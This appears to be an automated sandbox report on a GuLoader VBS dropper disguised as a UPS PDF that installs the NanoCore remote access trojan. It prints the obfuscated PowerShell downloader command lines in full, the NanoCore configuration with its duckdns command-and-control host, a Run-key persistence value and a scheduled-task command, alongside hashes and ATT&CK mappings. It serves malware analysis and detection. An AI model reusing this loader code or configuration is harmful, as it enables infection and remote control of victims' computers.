guloader | 2591a9311a86e838ae87d5bc29352907d99d4c83b5c83fa5853d969b0189a94e

Analysis

max time kernel
141s
max time network
151s
platform
windows7_x64
resource
win7-20231020-en
resource tags

arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system
submitted
03/11/2023, 07:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

UPS-49A829NDJWT·pdf.vbs
Size

88KB
MD5

049b3006c5921d2f2414c4ebcf063a98
SHA1

ae715ead1c8c639e58e625c180142519fb710a3d
SHA256

2591a9311a86e838ae87d5bc29352907d99d4c83b5c83fa5853d969b0189a94e
SHA512

d66d010caaede184b8f0f554a23abb988a0350ee261b89acdb0b0e808499c2f9a10c83d67c7a7f3bfe300d8ee8f9bf4f5cd689bce76e8ee101f233be4552886b
SSDEEP

1536:GtWVAKDExo0cPljwxpxzb7Zh2It+uW1wuQifXOh19iwnOFeBajpy4:0OhExXc9jwxph75t+XmXi/uLiwnseBc7

Score

10^/10

guloader nanocore downloader keylogger persistence spyware stealer trojan

Malware Config

Extracted

Family

nanocore

Version

1.2.2.0

wqqkgzmrdwxl8j.duckdns.org:23591

Mutex

5873ba14-cda0-426f-8178-3bf0fd9516f9

Attributes

activate_away_mode
true
backup_connection_host
backup_dns_server
buffer_size
65535
build_time
2023-07-30T10:08:27.978559236Z
bypass_user_account_control
false
bypass_user_account_control_data
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2Ij8+DQo8VGFzayB2ZXJzaW9uPSIxLjIiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmRvd3MvMjAwNC8wMi9taXQvdGFzayI+DQogIDxSZWdpc3RyYXRpb25JbmZvIC8+DQogIDxUcmlnZ2VycyAvPg0KICA8UHJpbmNpcGFscz4NCiAgICA8UHJpbmNpcGFsIGlkPSJBdXRob3IiPg0KICAgICAgPExvZ29uVHlwZT5JbnRlcmFjdGl2ZVRva2VuPC9Mb2dvblR5cGU+DQogICAgICA8UnVuTGV2ZWw+SGlnaGVzdEF2YWlsYWJsZTwvUnVuTGV2ZWw+DQogICAgPC9QcmluY2lwYWw+DQogIDwvUHJpbmNpcGFscz4NCiAgPFNldHRpbmdzPg0KICAgIDxNdWx0aXBsZUluc3RhbmNlc1BvbGljeT5QYXJhbGxlbDwvTXVsdGlwbGVJbnN0YW5jZXNQb2xpY3k+DQogICAgPERpc2FsbG93U3RhcnRJZk9uQmF0dGVyaWVzPmZhbHNlPC9EaXNhbGxvd1N0YXJ0SWZPbkJhdHRlcmllcz4NCiAgICA8U3RvcElmR29pbmdPbkJhdHRlcmllcz5mYWxzZTwvU3RvcElmR29pbmdPbkJhdHRlcmllcz4NCiAgICA8QWxsb3dIYXJkVGVybWluYXRlPnRydWU8L0FsbG93SGFyZFRlcm1pbmF0ZT4NCiAgICA8U3RhcnRXaGVuQXZhaWxhYmxlPmZhbHNlPC9TdGFydFdoZW5BdmFpbGFibGU+DQogICAgPFJ1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+ZmFsc2U8L1J1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+DQogICAgPElkbGVTZXR0aW5ncz4NCiAgICAgIDxTdG9wT25JZGxlRW5kPmZhbHNlPC9TdG9wT25JZGxlRW5kPg0KICAgICAgPFJlc3RhcnRPbklkbGU+ZmFsc2U8L1Jlc3RhcnRPbklkbGU+DQogICAgPC9JZGxlU2V0dGluZ3M+DQogICAgPEFsbG93U3RhcnRPbkRlbWFuZD50cnVlPC9BbGxvd1N0YXJ0T25EZW1hbmQ+DQogICAgPEVuYWJsZWQ+dHJ1ZTwvRW5hYmxlZD4NCiAgICA8SGlkZGVuPmZhbHNlPC9IaWRkZW4+DQogICAgPFJ1bk9ubHlJZklkbGU+ZmFsc2U8L1J1bk9ubHlJZklkbGU+DQogICAgPFdha2VUb1J1bj5mYWxzZTwvV2FrZVRvUnVuPg0KICAgIDxFeGVjdXRpb25UaW1lTGltaXQ+UFQwUzwvRXhlY3V0aW9uVGltZUxpbWl0Pg0KICAgIDxQcmlvcml0eT40PC9Qcmlvcml0eT4NCiAgPC9TZXR0aW5ncz4NCiAgPEFjdGlvbnMgQ29udGV4dD0iQXV0aG9yIj4NCiAgICA8RXhlYz4NCiAgICAgIDxDb21tYW5kPiIjRVhFQ1VUQUJMRVBBVEgiPC9Db21tYW5kPg0KICAgICAgPEFyZ3VtZW50cz4kKEFyZzApPC9Bcmd1bWVudHM+DQogICAgPC9FeGVjPg0KICA8L0FjdGlvbnM+DQo8L1Rhc2s+
clear_access_control
true
clear_zone_identifier
false
connect_delay
4000
connection_port
23591
default_group
Default
enable_debug_mode
true
gc_threshold
1.048576e+07
keep_alive_timeout
30000
keyboard_logging
false
lan_timeout
2500
max_packet_size
1.048576e+07
mutex
5873ba14-cda0-426f-8178-3bf0fd9516f9
mutex_timeout
5000
prevent_system_sleep
false
primary_connection_host
wqqkgzmrdwxl8j.duckdns.org
primary_dns_server
wqqkgzmrdwxl8j.duckdns.org
request_elevation
true
restart_delay
5000
run_delay
0
run_on_startup
true
set_critical_process
true
timeout_interval
5000
use_custom_dns_server
false
version
1.2.2.0
wan_timeout
8000

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
keylogger trojan stealer spyware nanocore

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Windows\CurrentVersion\Run\Aofspov = "%Casewa% -w 1 $Gnaw=(Get-ItemProperty -Path 'HKCU:\\Thin\\').Redis100;%Casewa% ($Gnaw)"	caspol.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2732	caspol.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2488	powershell.exe
2732	caspol.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2488 set thread context of 2732	2488	powershell.exe	34

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1800	schtasks.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2728	powershell.exe
2488	powershell.exe
2732	caspol.exe
2732	caspol.exe
2732	caspol.exe
2732	caspol.exe
2732	caspol.exe
2732	caspol.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2732	caspol.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2488	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2728	powershell.exe
Token: SeDebugPrivilege	2488	powershell.exe
Token: SeDebugPrivilege	2732	caspol.exe

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 2152 wrote to memory of 2728	2152	WScript.exe	31
PID 2152 wrote to memory of 2728	2152	WScript.exe	31
PID 2152 wrote to memory of 2728	2152	WScript.exe	31
PID 2728 wrote to memory of 2488	2728	powershell.exe	33
PID 2728 wrote to memory of 2488	2728	powershell.exe	33
PID 2728 wrote to memory of 2488	2728	powershell.exe	33
PID 2728 wrote to memory of 2488	2728	powershell.exe	33
PID 2488 wrote to memory of 2732	2488	powershell.exe	34
PID 2488 wrote to memory of 2732	2488	powershell.exe	34
PID 2488 wrote to memory of 2732	2488	powershell.exe	34
PID 2488 wrote to memory of 2732	2488	powershell.exe	34
PID 2488 wrote to memory of 2732	2488	powershell.exe	34
PID 2488 wrote to memory of 2732	2488	powershell.exe	34
PID 2732 wrote to memory of 1800	2732	caspol.exe	37
PID 2732 wrote to memory of 1800	2732	caspol.exe	37
PID 2732 wrote to memory of 1800	2732	caspol.exe	37
PID 2732 wrote to memory of 1800	2732	caspol.exe	37

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\UPS-49A829NDJWT·pdf.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2152
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "function Restord ([String]$Toffymenun){$Valfart229 = 8;For($Inkompat=7; $Inkompat -lt $Toffymenun.Length-1; $Inkompat+=$Valfart229){$Tonnesbry=$Tonnesbry+$Toffymenun.Substring($Inkompat, 1)};$Tonnesbry;}$Stra=Restord ' Homemah TeamcotSicklewtAlgebarpPyorrhesHyggesp:Ressort/modnede/Astrofyd RheumarIdiotisibludagsv BersrkeAmatito.MiddycogPilottooUnfakaboHjemmebg EschatlBannereeDopmult.TegnflgcProgramoVagereamProsais/GuacosauPredictcCoroniz?MimpteteMadgladxBallonnpKodestro SchferrBarbaretSordidi=RutebildTilslutoPreprudwTereaggnscumbagl precutoEngangsa Enquirddeerton&NoneconiPlatfordDisputa=Fonolog1ErichthwGaardhuGBismersBmaikensvSucklinDRhodamikAtionzo2 BiorytmFestineeOverhelUSalpetepBesvangR Outscog Mrknin1KursusoISkraberLRvesvnssPronunc4Hyrdernu NutcakjIbarapp0NegatiozHalvtag5Trskedepfriendl6UnstatiVsociose9SortlisUBristerIHanrejewArdebsptSnuggleuBenedde ';$Tonnesbry01=Restord 'Melchori HaandmePesoregxGrnnesb ';$pyridin= $Tonnesbry01;$Juris = Restord 'Lacklus\TedisomsEgensinySodiosasagricolwVristsaoBacteriwChasing6 Paraph4Ekphori\ConcinnW KaserniBlockadnantirusd TaurocoVidnefowGiponsis EtaterPWienskeoOveningwOutvenoeForsknirPhylesiSBulliedhsulpicieOverpriludhvelsl Callio\Svengalvankepun1 Feteri.Indeksn0Egenmgt\MyaprobpUdgaarao FaultewChronoge Delignr unmauds LandephCooperseMinutisl Atrepsl Ftfend.AbsoluteSkifferxhypochceReforme '; & ($Tonnesbry01) (Restord 'Geranom$DirigerCForbrndlGeneralugasmaalsIkldtbrtRingerne Doreenr Readso2Postrac=Synapti$TandhjuePrecorrn SprrebvTeglbrn: KatjonwplenituiSaccophn PostvodKnobbieiSavklinr Skatte ') ; &($Tonnesbry01) (Restord ' Alpebl$FarveatJ PyrroluInterprr KldtefiWestroas Intima=Program$TransceCUnblemilReburiau bofllesNondisstVekslineViragoerdunhams2Akkumul+Genbrug$KnapbanJGolfedcuVrlingmrAlisekaiungdomssLivssti ') ; . ($Tonnesbry01) (Restord 'Sacchar$FerrelsBPatchwilAbysfabyBevinedtStraalekTidshorkGrcistgeShowsto Xenoch= Preach Cupros(Munkeor( CrabitgMystifiwVidenskmPartialiSkammek Softcoaw DenudiiIndemninTvangsr3Phlebot2 Sprogk_CalorespThacklerearfloworeedilyc UrbefoekogejomsCeromatsDatafel Nattegn- DatamaFHomosek lovsangPEspeciar DissidoRetorticSidekice udskifsplastogs StadsaIChristed nonlit=Gennems$Diactin{PolyhedPSlipstrIPrudelyDKremati}Polyide)Bullerd.ChanginCSyndensoOpklodsmDiadumemSkildera ComputnAppliced IndtrrLClunkeriUnbucklnGluciniePlsindf) Svitse Pyelogr- Progras MonofipFiskebel EncyclipholadotMagistr Emaneo[ AmtspocBagdadth GaufreaSomnambrCanoelu] Aandsf3Laborat4Nickeyr '); . ($Tonnesbry01) (Restord 'Santano$FieldincKunstgdhremplaceEvighedtEfterbetKommensy XylophpShovesoe Morphi Danska= Spille skrivem$plisserBSildebelIncogniyRoweledtFourierk SchizokTraadspeAbsenta[Forstad$ TipsifBUdskriflmorfinbyChristotalveolikFishpook TalotieUnloose.StamcafcPrespecoEvilsayuIngenlun TamerstInterpo-Grahami2Grayhea] Precou '); . ($Tonnesbry01) (Restord 'Wingedm$IntermaKPiaffinaPhosphopTiltvineFaseforlnonintumArbejdsuMasconssPartileiPinederkPhyllos1Baandsp4 Retsin9Bougero=Brnders(PostmarTHousybieHagarensBuserhetBearbej-KoglespPLedsageaSlutkuntNonamazhforlyde Unathle$GimpernJ Ptarmiustormagr UdvalgiAutotubs discor) Bowlin Kanali-persuasA SkvulpnSolipsidPaltrie Blairs(blomste[ReconneI SvindenOvercomt VesicuPgavelintPrehensrHmmespr]forlyst:Overlbs: SprinksAabnerniFlammesz UnfeudeLoyolit Dejetfo-Trofetfe YemeniqMyomato Eskimoe8Godivau) Pyroch ') ;if ($Kapelmusik149) { . $Juris $chettype;} else {;$Tonnesbry00=Restord 'CnicinvS AntepetBlodbesaGutibaprHerbergtUndergo-ExcelsmB FestinigenlsnitSilaginsMashierTNailfolrEctognaa pseudonVasotomsAntifeufTrdesteeBnnestnrDosered Blddyre-MukkeriSNonperfoAnebilluQuietusr AmtsracCrosbyseDanebro applic$SusissySOphiolotLampeberKbsfaktaKatteau Drudesw-TvanmelDRappelleSelvstnsvrissentDonnerdiLingerinOplandea FredeltTreaarsi GuemuloTakstgrn Brandm Ochrole$OvercooCmedtagnlMarsvinuEnarchssnonconctRoadbedeFeuillerSpinula2Nonsynt ';& ($Tonnesbry01) (Restord ' Filtra$raketpaCtravedel ZelinauVaskerisMosquittUprearseRevealar Toecap2Detoxif= Minija$TempelkeVantagenSaboterv Luanns:ReinersaAdvocatpObligatpEventyrdHalcyona jawedptPrecereamythoge ') ; . ($Tonnesbry01) (Restord 'ScoringIUdlbsdamLodtrknpKrydsogoEverlysrintercatSneaksm-bruttovMUspshamoRedegredFeltertuUnfavoulErstatneFordamp ForjttBBlackeriStropertJantelos ReilasTNamelyerincoheraGrnthannFinskbrsvidundefBjningseSuperinr Fosser ') ;$Cluster2=$Cluster2+'\Delstenen.Bac';while (-not $sprogkl) { . ($Tonnesbry01) (Restord 'Grudgep$ForlegnsMakkersp PaasknrJannetsoInspectg intimikSyncarplBesindi=Kropsko( skolarTCorpseoePrismrksUdbdbustDiletta-BebusybPReincita beglootPersonnhHaworth ingenio$StarshaC UndervlEntertauStrenges HorschtRhodobaeDesignerJgvanmi2Catalog)Neurops ') ; & ($Tonnesbry01) $Tonnesbry00; . ($Tonnesbry01) (Restord 'CementsSOutjetttkberensaUntoxicr ManatetSynkret-PyrrhotSForudbel RundineStrobice Pebermp Finans Isolati5 Fossil ');} . ($Tonnesbry01) (Restord 'Biseksu$TropeolPPotteafrGeminisoTantedesUnderstyVandrig Shammie=Forches ProaerG NavngieOpskrertKladdeb- StuntmCNeostigoprosurrn opmuntt lokumeeTmrervrnDisburdt Dacryo Imprgne$FraskriCHarperalUnderviuCakiless SchizotChaksikeIdeposerSommerf2Sambhur '); & ($Tonnesbry01) (Restord 'Souther$UnbiassENonmedilBarselfeMaximizkAfstemp Fjernt= Elviss Operati[UnsolidS TrophoyChandelsRhizopotOvercoaerundhormMaureen.MetalhjC Laminao Nonrecn Serberv Fortide BantamrKoalititStengul]Overatt:Takstgr: MerkunFLymphanr Rosinbo DerhenmIscenesB OplgshaOxalidasReferene Enclit6Postcon4 OverhuSSpaltegtUnderrurPederstiRikochenFsiestogNickers(Haabera$ApyrasePFoxinesrdescriboUdgiftssbydelsoyOutstre)Outstar '); &($Tonnesbry01) (Restord 'Medusel$KoldestTmedianeoLyssynpnBedesten Documee SljfnisGeitjieb Properrskarnsuy Animal2 Aktion Justits=Degerme Leptoda[IntrapsS natskyyHulemals Meddelt OpstraeGblystrmPrejudi.RuffersTOrthforeTresaarx CollagtVgesvan.CosmoloEOpdyngen UnwestcUnfatuioForlngedDishabiiMargarenUndulatgdriveaw]Symbolo:Algomet:pantagaATjenestSOverideCTurlupiIImbonitIcurvica.BevatroGHydrogeeudturtatFormaliSSomalietjigglier RussisiCorncrunIntrastgAstasia(Stnings$curatesESwitchelGvendeneChulhaskGordanb)Rekindl '); & ($Tonnesbry01) (Restord 'Vitalis$XerophyPPeritonhAlmoneriTuristelArbejdsaLetbenenVrdipaptKiakineh UnbuxorFolkeun=Symbolb$UnrepleTBindegaoMalerinninkassbnCentraleForsknisAnemolobObsedesrTransvay Bonevo2Indikat.GymnastsAfvrgenucyrillibDrbelarsLernaeotIroniker FunktiiBrdristnCanchalgCandyma(Odisest2Godkend8Arbejde4redukti6Retraic0Repropm2Snydepr, Trvled1vanishe9Kloaker7 Nonpli0Reprosp2Southwe)Thwarte '); . ($Tonnesbry01) $Philanthr;}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2728
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "function Restord ([String]$Toffymenun){$Valfart229 = 8;For($Inkompat=7; $Inkompat -lt $Toffymenun.Length-1; $Inkompat+=$Valfart229){$Tonnesbry=$Tonnesbry+$Toffymenun.Substring($Inkompat, 1)};$Tonnesbry;}$Stra=Restord ' Homemah TeamcotSicklewtAlgebarpPyorrhesHyggesp:Ressort/modnede/Astrofyd RheumarIdiotisibludagsv BersrkeAmatito.MiddycogPilottooUnfakaboHjemmebg EschatlBannereeDopmult.TegnflgcProgramoVagereamProsais/GuacosauPredictcCoroniz?MimpteteMadgladxBallonnpKodestro SchferrBarbaretSordidi=RutebildTilslutoPreprudwTereaggnscumbagl precutoEngangsa Enquirddeerton&NoneconiPlatfordDisputa=Fonolog1ErichthwGaardhuGBismersBmaikensvSucklinDRhodamikAtionzo2 BiorytmFestineeOverhelUSalpetepBesvangR Outscog Mrknin1KursusoISkraberLRvesvnssPronunc4Hyrdernu NutcakjIbarapp0NegatiozHalvtag5Trskedepfriendl6UnstatiVsociose9SortlisUBristerIHanrejewArdebsptSnuggleuBenedde ';$Tonnesbry01=Restord 'Melchori HaandmePesoregxGrnnesb ';$pyridin= $Tonnesbry01;$Juris = Restord 'Lacklus\TedisomsEgensinySodiosasagricolwVristsaoBacteriwChasing6 Paraph4Ekphori\ConcinnW KaserniBlockadnantirusd TaurocoVidnefowGiponsis EtaterPWienskeoOveningwOutvenoeForsknirPhylesiSBulliedhsulpicieOverpriludhvelsl Callio\Svengalvankepun1 Feteri.Indeksn0Egenmgt\MyaprobpUdgaarao FaultewChronoge Delignr unmauds LandephCooperseMinutisl Atrepsl Ftfend.AbsoluteSkifferxhypochceReforme '; & ($Tonnesbry01) (Restord 'Geranom$DirigerCForbrndlGeneralugasmaalsIkldtbrtRingerne Doreenr Readso2Postrac=Synapti$TandhjuePrecorrn SprrebvTeglbrn: KatjonwplenituiSaccophn PostvodKnobbieiSavklinr Skatte ') ; &($Tonnesbry01) (Restord ' Alpebl$FarveatJ PyrroluInterprr KldtefiWestroas Intima=Program$TransceCUnblemilReburiau bofllesNondisstVekslineViragoerdunhams2Akkumul+Genbrug$KnapbanJGolfedcuVrlingmrAlisekaiungdomssLivssti ') ; . ($Tonnesbry01) (Restord 'Sacchar$FerrelsBPatchwilAbysfabyBevinedtStraalekTidshorkGrcistgeShowsto Xenoch= Preach Cupros(Munkeor( CrabitgMystifiwVidenskmPartialiSkammek Softcoaw DenudiiIndemninTvangsr3Phlebot2 Sprogk_CalorespThacklerearfloworeedilyc UrbefoekogejomsCeromatsDatafel Nattegn- DatamaFHomosek lovsangPEspeciar DissidoRetorticSidekice udskifsplastogs StadsaIChristed nonlit=Gennems$Diactin{PolyhedPSlipstrIPrudelyDKremati}Polyide)Bullerd.ChanginCSyndensoOpklodsmDiadumemSkildera ComputnAppliced IndtrrLClunkeriUnbucklnGluciniePlsindf) Svitse Pyelogr- Progras MonofipFiskebel EncyclipholadotMagistr Emaneo[ AmtspocBagdadth GaufreaSomnambrCanoelu] Aandsf3Laborat4Nickeyr '); . ($Tonnesbry01) (Restord 'Santano$FieldincKunstgdhremplaceEvighedtEfterbetKommensy XylophpShovesoe Morphi Danska= Spille skrivem$plisserBSildebelIncogniyRoweledtFourierk SchizokTraadspeAbsenta[Forstad$ TipsifBUdskriflmorfinbyChristotalveolikFishpook TalotieUnloose.StamcafcPrespecoEvilsayuIngenlun TamerstInterpo-Grahami2Grayhea] Precou '); . ($Tonnesbry01) (Restord 'Wingedm$IntermaKPiaffinaPhosphopTiltvineFaseforlnonintumArbejdsuMasconssPartileiPinederkPhyllos1Baandsp4 Retsin9Bougero=Brnders(PostmarTHousybieHagarensBuserhetBearbej-KoglespPLedsageaSlutkuntNonamazhforlyde Unathle$GimpernJ Ptarmiustormagr UdvalgiAutotubs discor) Bowlin Kanali-persuasA SkvulpnSolipsidPaltrie Blairs(blomste[ReconneI SvindenOvercomt VesicuPgavelintPrehensrHmmespr]forlyst:Overlbs: SprinksAabnerniFlammesz UnfeudeLoyolit Dejetfo-Trofetfe YemeniqMyomato Eskimoe8Godivau) Pyroch ') ;if ($Kapelmusik149) { . $Juris $chettype;} else {;$Tonnesbry00=Restord 'CnicinvS AntepetBlodbesaGutibaprHerbergtUndergo-ExcelsmB FestinigenlsnitSilaginsMashierTNailfolrEctognaa pseudonVasotomsAntifeufTrdesteeBnnestnrDosered Blddyre-MukkeriSNonperfoAnebilluQuietusr AmtsracCrosbyseDanebro applic$SusissySOphiolotLampeberKbsfaktaKatteau Drudesw-TvanmelDRappelleSelvstnsvrissentDonnerdiLingerinOplandea FredeltTreaarsi GuemuloTakstgrn Brandm Ochrole$OvercooCmedtagnlMarsvinuEnarchssnonconctRoadbedeFeuillerSpinula2Nonsynt ';& ($Tonnesbry01) (Restord ' Filtra$raketpaCtravedel ZelinauVaskerisMosquittUprearseRevealar Toecap2Detoxif= Minija$TempelkeVantagenSaboterv Luanns:ReinersaAdvocatpObligatpEventyrdHalcyona jawedptPrecereamythoge ') ; . ($Tonnesbry01) (Restord 'ScoringIUdlbsdamLodtrknpKrydsogoEverlysrintercatSneaksm-bruttovMUspshamoRedegredFeltertuUnfavoulErstatneFordamp ForjttBBlackeriStropertJantelos ReilasTNamelyerincoheraGrnthannFinskbrsvidundefBjningseSuperinr Fosser ') ;$Cluster2=$Cluster2+'\Delstenen.Bac';while (-not $sprogkl) { . ($Tonnesbry01) (Restord 'Grudgep$ForlegnsMakkersp PaasknrJannetsoInspectg intimikSyncarplBesindi=Kropsko( skolarTCorpseoePrismrksUdbdbustDiletta-BebusybPReincita beglootPersonnhHaworth ingenio$StarshaC UndervlEntertauStrenges HorschtRhodobaeDesignerJgvanmi2Catalog)Neurops ') ; & ($Tonnesbry01) $Tonnesbry00; . ($Tonnesbry01) (Restord 'CementsSOutjetttkberensaUntoxicr ManatetSynkret-PyrrhotSForudbel RundineStrobice Pebermp Finans Isolati5 Fossil ');} . ($Tonnesbry01) (Restord 'Biseksu$TropeolPPotteafrGeminisoTantedesUnderstyVandrig Shammie=Forches ProaerG NavngieOpskrertKladdeb- StuntmCNeostigoprosurrn opmuntt lokumeeTmrervrnDisburdt Dacryo Imprgne$FraskriCHarperalUnderviuCakiless SchizotChaksikeIdeposerSommerf2Sambhur '); & ($Tonnesbry01) (Restord 'Souther$UnbiassENonmedilBarselfeMaximizkAfstemp Fjernt= Elviss Operati[UnsolidS TrophoyChandelsRhizopotOvercoaerundhormMaureen.MetalhjC Laminao Nonrecn Serberv Fortide BantamrKoalititStengul]Overatt:Takstgr: MerkunFLymphanr Rosinbo DerhenmIscenesB OplgshaOxalidasReferene Enclit6Postcon4 OverhuSSpaltegtUnderrurPederstiRikochenFsiestogNickers(Haabera$ApyrasePFoxinesrdescriboUdgiftssbydelsoyOutstre)Outstar '); &($Tonnesbry01) (Restord 'Medusel$KoldestTmedianeoLyssynpnBedesten Documee SljfnisGeitjieb Properrskarnsuy Animal2 Aktion Justits=Degerme Leptoda[IntrapsS natskyyHulemals Meddelt OpstraeGblystrmPrejudi.RuffersTOrthforeTresaarx CollagtVgesvan.CosmoloEOpdyngen UnwestcUnfatuioForlngedDishabiiMargarenUndulatgdriveaw]Symbolo:Algomet:pantagaATjenestSOverideCTurlupiIImbonitIcurvica.BevatroGHydrogeeudturtatFormaliSSomalietjigglier RussisiCorncrunIntrastgAstasia(Stnings$curatesESwitchelGvendeneChulhaskGordanb)Rekindl '); & ($Tonnesbry01) (Restord 'Vitalis$XerophyPPeritonhAlmoneriTuristelArbejdsaLetbenenVrdipaptKiakineh UnbuxorFolkeun=Symbolb$UnrepleTBindegaoMalerinninkassbnCentraleForsknisAnemolobObsedesrTransvay Bonevo2Indikat.GymnastsAfvrgenucyrillibDrbelarsLernaeotIroniker FunktiiBrdristnCanchalgCandyma(Odisest2Godkend8Arbejde4redukti6Retraic0Repropm2Snydepr, Trvled1vanishe9Kloaker7 Nonpli0Reprosp2Southwe)Thwarte '); . ($Tonnesbry01) $Philanthr;}"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2488
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe"
      4⤵
      Adds Run key to start application
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2732
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks.exe" /create /f /tn "UDP Manager" /xml "C:\Users\Admin\AppData\Local\Temp\tmp2A1E.tmp"
        5⤵
        Creates scheduled task(s)
        
        PID:1800

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
5a713d4a6385e1669a8701a96261fff7

SHA1
bcca162d1be1cc148d9e48148330d2a3712e37ed

SHA256
cf98531ba7e61ab3810fd0e378fdef01be759234aa80eb0efbf3f6c2be13f99d

SHA512
d529eee291cfdc54635d6485a62abc14a2c224f370eb3335bcf8447f73c62032193196bd35705fece1e0332fb633f8a241bf3327eb3319ef78eeffc789deb8e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab2166.tmp

Filesize
61KB

MD5
f3441b8572aae8801c04f3060b550443

SHA1
4ef0a35436125d6821831ef36c28ffaf196cda15

SHA256
6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

SHA512
5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp2A1E.tmp

Filesize
1KB

MD5
497f298fc157762f192a7c42854c6fb6

SHA1
04bec630f5cc64ea17c0e3e780b3ccf15a35c6e0

SHA256
3462cbe62fbb64fc53a0fcf97e43baafe9dd9929204f586a86afe4b89d8048a6

SHA512
c7c6fd3097f4d1ccd313160fedf7cb031644e0836b8c3e25481095e5f4b003759bc84fc6ea9421e3a090e66dc2ff875fec2f394a386691ab178cb164733411b2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\E8SUY0I8GSPBS78BYLV1.temp

Filesize
7KB

MD5
d2add9ff77d4854774bfb20e7c1c861a

SHA1
8b66bb16d0a4da92189ded63a5b18c83b0d4cb42

SHA256
eb0aa11803fdade5ec090b85a6055988f6342270a99d7a225e29c3e0368a1019

SHA512
c5faf9405ef2510573fff9d114a2438e66d56f32c6f74f2fba0f7bde364555b34b0a74c5b0526b32e68ea9a6a407c4c196b06724de5b5aa7f4dffca1eb0551ee

Download Submit
memory/2488-36-0x00000000064A0000-0x0000000007DF7000-memory.dmp

Filesize
25.3MB

Download
memory/2488-33-0x0000000000250000-0x0000000000290000-memory.dmp

Filesize
256KB

Download
memory/2488-77-0x00000000064A0000-0x0000000007DF7000-memory.dmp

Filesize
25.3MB

Download
memory/2488-71-0x0000000073460000-0x0000000073A0B000-memory.dmp

Filesize
5.7MB

Download
memory/2488-69-0x0000000000250000-0x0000000000290000-memory.dmp

Filesize
256KB

Download
memory/2488-14-0x0000000073460000-0x0000000073A0B000-memory.dmp

Filesize
5.7MB

Download
memory/2488-15-0x0000000073460000-0x0000000073A0B000-memory.dmp

Filesize
5.7MB

Download
memory/2488-16-0x0000000000250000-0x0000000000290000-memory.dmp

Filesize
256KB

Download
memory/2488-17-0x0000000000250000-0x0000000000290000-memory.dmp

Filesize
256KB

Download
memory/2488-41-0x0000000077610000-0x00000000776E6000-memory.dmp

Filesize
856KB

Download
memory/2488-39-0x00000000064A0000-0x0000000007DF7000-memory.dmp

Filesize
25.3MB

Download
memory/2488-40-0x0000000077420000-0x00000000775C9000-memory.dmp

Filesize
1.7MB

Download
memory/2488-35-0x00000000064A0000-0x0000000007DF7000-memory.dmp

Filesize
25.3MB

Download
